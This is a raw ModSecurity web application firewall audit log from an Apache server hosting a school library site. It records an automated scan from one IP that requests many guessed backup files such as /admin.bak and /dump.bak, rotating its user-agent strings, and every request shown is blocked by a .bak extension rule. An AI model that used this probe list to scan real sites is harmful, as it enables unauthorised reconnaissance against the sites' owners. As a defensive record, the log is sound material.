p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c230662-Z-- --0ed3d335-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon7QAAABg 103.236.140.4 59638 103.236.140.4 8181 --0ed3d335-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.4.1) Gecko/20100101 Firefox/52.4.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166199308 --0ed3d335-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ed3d335-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201523051 4742 (- - -) Stopwatch2: 1747683201523051 4742; combined=1817, p1=468, p2=1319, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ed3d335-Z-- --4eee252b-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_pAAAAIQ 103.236.140.4 59070 103.236.140.4 8181 --4eee252b-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151158808 --4eee252b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4eee252b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201526933 1672 (- - -) Stopwatch2: 1747683201526933 1672; combined=629, p1=316, p2=288, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eee252b-Z-- --ebadcd02-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_qAAAAIM 103.236.140.4 60904 103.236.140.4 8181 --ebadcd02-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162758668 --ebadcd02-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ebadcd02-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201526093 6269 (- - -) Stopwatch2: 1747683201526093 6269; combined=729, p1=306, p2=389, p3=0, p4=0, p5=34, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebadcd02-Z-- --c3d32e3c-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFswAAAM4 103.236.140.4 32784 103.236.140.4 8181 --c3d32e3c-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168034307 --c3d32e3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c3d32e3c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201529807 3278 (- - -) Stopwatch2: 1747683201529807 3278; combined=719, p1=352, p2=342, p3=0, p4=0, p5=25, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d32e3c-Z-- --f539cf7e-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oGQAAAFE 103.236.140.4 59850 103.236.140.4 8181 --f539cf7e-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153976874 --f539cf7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f539cf7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201529367 6125 (- - -) Stopwatch2: 1747683201529367 6125; combined=771, p1=290, p2=457, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f539cf7e-Z-- --6dbc9214-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oJQAAAFA 103.236.140.4 59608 103.236.140.4 8181 --6dbc9214-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700101 --6dbc9214-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6dbc9214-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201793551 2616 (- - -) Stopwatch2: 1747683201793551 2616; combined=1038, p1=465, p2=533, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dbc9214-Z-- --7a854a22-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooOwAAAAI 103.236.140.4 59380 103.236.140.4 8181 --7a854a22-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167804940 --7a854a22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7a854a22-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201809317 2005 (- - -) Stopwatch2: 1747683201809317 2005; combined=725, p1=301, p2=384, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a854a22-Z-- --96617675-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFxAAAAMg 103.236.140.4 58918 103.236.140.4 8181 --96617675-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:59.0.2) Gecko/20100101 Firefox/59.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162529307 --96617675-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --96617675-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201811238 1660 (- - -) Stopwatch2: 1747683201811238 1660; combined=647, p1=322, p2=295, p3=0, p4=0, p5=29, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96617675-Z-- --652ed541-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_twAAAIw 103.236.140.4 60856 103.236.140.4 8181 --652ed541-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161447984 --652ed541-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --652ed541-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201831693 1651 (- - -) Stopwatch2: 1747683201831693 1651; combined=588, p1=287, p2=274, p3=0, p4=0, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --652ed541-Z-- --c08a7615-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooVQAAAAQ 103.236.140.4 59864 103.236.140.4 8181 --c08a7615-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 OPR/58.0.3135.107 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152764482 --c08a7615-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c08a7615-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201840798 1742 (- - -) Stopwatch2: 1747683201840798 1742; combined=626, p1=298, p2=283, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c08a7615-Z-- --9c87aa32-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooXQAAAA0 103.236.140.4 59692 103.236.140.4 8181 --9c87aa32-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0.1) Gecko/20100101 Firefox/65.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871652 --9c87aa32-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9c87aa32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201855578 1725 (- - -) Stopwatch2: 1747683201855578 1725; combined=632, p1=291, p2=313, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c87aa32-Z-- --492d0108-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooYgAAAAc 103.236.140.4 59692 103.236.140.4 8181 --492d0108-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.3.0) Gecko/20100101 Firefox/60.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530486 --492d0108-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --492d0108-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201863260 1859 (- - -) Stopwatch2: 1747683201863260 1859; combined=627, p1=309, p2=286, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --492d0108-Z-- --4388ad6e-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooZAAAABY 103.236.140.4 59750 103.236.140.4 8181 --4388ad6e-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167804952 --4388ad6e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4388ad6e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201866935 1824 (- - -) Stopwatch2: 1747683201866935 1824; combined=665, p1=327, p2=311, p3=0, p4=0, p5=27, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4388ad6e-Z-- --0b2c9d27-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFyAAAAMo 103.236.140.4 58918 103.236.140.4 8181 --0b2c9d27-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166166552 --0b2c9d27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0b2c9d27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201937115 1900 (- - -) Stopwatch2: 1747683201937115 1900; combined=632, p1=324, p2=283, p3=0, p4=0, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b2c9d27-Z-- --c7c3443b-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIoofAAAAA8 103.236.140.4 59380 103.236.140.4 8181 --c7c3443b-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166166555 --c7c3443b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c7c3443b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201947110 2859 (- - -) Stopwatch2: 1747683201947110 2859; combined=986, p1=458, p2=493, p3=0, p4=0, p5=35, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c3443b-Z-- --5688cf4a-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIoohAAAAAk 103.236.140.4 59750 103.236.140.4 8181 --5688cf4a-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871673 --5688cf4a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5688cf4a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201952915 2326 (- - -) Stopwatch2: 1747683201952915 2326; combined=966, p1=507, p2=422, p3=0, p4=0, p5=37, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5688cf4a-Z-- --69e70f74-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_wAAAAJA 103.236.140.4 60856 103.236.140.4 8181 --69e70f74-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 OPR/58.0.3135.107 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160792591 